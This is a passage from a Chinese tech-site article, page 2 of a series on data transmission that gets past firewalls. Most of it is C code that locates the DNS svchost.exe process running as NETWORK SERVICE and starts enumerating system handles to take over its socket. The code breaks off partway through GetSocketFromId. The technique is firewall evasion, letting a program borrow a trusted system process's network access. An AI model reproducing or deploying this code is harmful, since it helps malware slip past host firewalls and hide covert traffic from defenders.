科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网网络频道新的穿透防火墙的数据传输技术(2)

新的穿透防火墙的数据传输技术(2)

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

下面是通过直接控制DNS进程(其实也就是svchost.exe,不过对应用户名是NETWORK SERVICE)进行数据传输的例子。

作者:51CTO.COM 2007年10月28日

关键字: DNS 防火墙 数据传输 进程

  • 评论
  • 分享微博
  • 分享邮件

  {

  BOOL ret = FALSE;

  char NTDLL_DLL[] = "ntdll.dll";

  HMODULE ntdll_dll = NULL;

  if ( ( ntdll_dll = GetModuleHandle( NTDLL_DLL ) ) == NULL )

  {

  printf( "GetModuleHandle() failed");

  return( FALSE );

  }

  if ( !( ZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetProcAddress

  ( ntdll_dll, "ZwQuerySystemInformation" ) ) )

  {

  goto LocateNtdllEntry_exit;

  }

  ret = TRUE;

  LocateNtdllEntry_exit:

  if ( FALSE == ret )

  {

  printf( "GetProcAddress() failed");

  }

  ntdll_dll = NULL;

  return( ret );

  }

  /*++

  This routine is used to get a process's username from it's SID

  --*/

  BOOL GetUserNameFromSid(PSID pUserSid, char *szUserName)

  {

  // sanity checks and default value

  if (pUserSid == NULL)

  return false;

  strcpy(szUserName, "?");

  SID_NAME_USE snu;

  TCHAR szUser[_MAX_PATH];

  DWORD chUser = _MAX_PATH;

  PDWORD pcchUser = &chUser;

  TCHAR szDomain[_MAX_PATH];

  DWORD chDomain = _MAX_PATH;

  PDWORD pcchDomain = &chDomain;

  // Retrieve user name and domain name based on user's SID.

  if (

  ::LookupAccountSid(

  NULL,

  pUserSid,

  szUser,

  pcchUser,

  szDomain,

  pcchDomain,

  &snu

  )

  )

  {

  wsprintf(szUserName, "%s", szUser);

  }

  else

  {

  return false;

  }

  return true;

  }

  /*++

  This routine is used to get the DNS process's Id

  Here, I use WTSEnumerateProcesses to get process user Sid,

  and then get the process user name. Beacause as it's a "NETWORK SERVICE",

  we cann't use OpenProcessToken to catch the DNS process's token information,

  even if we has the privilege in catching the SYSTEM's.

  --*/

  DWORD GetDNSProcessId()

  {

  PWTS_PROCESS_INFO pProcessInfo = NULL;

  DWORD ProcessCount = 0;

  char szUserName[255];

  DWORD Id = -1;

  if (WTSEnumerateProcesses(WTS_CURRENT_SERVER_HANDLE, 0, 1, &pProcessInfo, &ProcessCount))

  {

  // dump each process description

  for (DWORD CurrentProcess = 0; CurrentProcess

  {

  if( strcmp(pProcessInfo[CurrentProcess].pProcessName, "svchost.exe") == 0 )

  {

  GetUserNameFromSid(pProcessInfo[CurrentProcess].pUserSid, szUserName);

  if( strcmp(szUserName, "NETWORK SERVICE") == 0)

  {

  Id = pProcessInfo[CurrentProcess].ProcessId;

  break;

  }

  }

  }

  WTSFreeMemory(pProcessInfo);

  }

  return Id;

  }

  /*++

  This doesn't work as we know, sign...

  but you can use the routine for other useing...

  --*/

  /*

  BOOL GetProcessUserFromId(char *szAccountName, DWORD PID)

  {

  HANDLE hProcess = NULL,

  hAccessToken = NULL;

  TCHAR InfoBuffer[1000], szDomainName[200];

  PTOKEN_USER pTokenUser = (PTOKEN_USER)InfoBuffer;

  DWORD dwInfoBufferSize,dwAccountSize = 200, dwDomainSize = 200;

  SID_NAME_USE snu;

  hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, PID);

  if(hProcess == NULL)

  {

  printf("OpenProcess wrong");

  CloseHandle(hProcess);

  return false;

  }

  if(0 == OpenProcessToken(hProcess,TOKEN_QUERY,&hAccessToken))

  {

  printf("OpenProcessToken wrong:%08x", GetLastError());

  return false;

  }

  GetTokenInformation(hAccessToken,TokenUser,InfoBuffer,

  1000, &dwInfoBufferSize);

  LookupAccountSid(NULL, pTokenUser->User.Sid, szAccountName,

  &dwAccountSize,szDomainName, &dwDomainSize, &snu);

  if(hProcess)

  CloseHandle(hProcess);

  if(hAccessToken)

  CloseHandle(hAccessToken);

  return true;

  }*/

  /*++

  Now, it is the most important stuff... ^_^

  --*/

  SOCKET GetSocketFromId (DWORD PID)

  {

  NTSTATUS status;

  PVOID buf = NULL;

  ULONG size = 1;

  ULONG NumOfHandle = 0;

  ULONG i;

  PSYSTEM_HANDLE_INFORMATION h_info = NULL;

  HANDLE sock = NULL;

  DWORD n;

  buf=malloc(0x1000);

  if(buf == NULL)

  {

  printf("malloc wrong\n");

  return NULL;

  }

  status = ZwQuerySystemInformation( 0x10, buf, 0x1000, &n );

  if(STATUS_INFO_LENGTH_MISMATCH == status)

  {

  free(buf);

  buf=malloc(n);

  if(buf == NULL)

  {

  printf("malloc wrong\n");

  return NULL;

  }

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章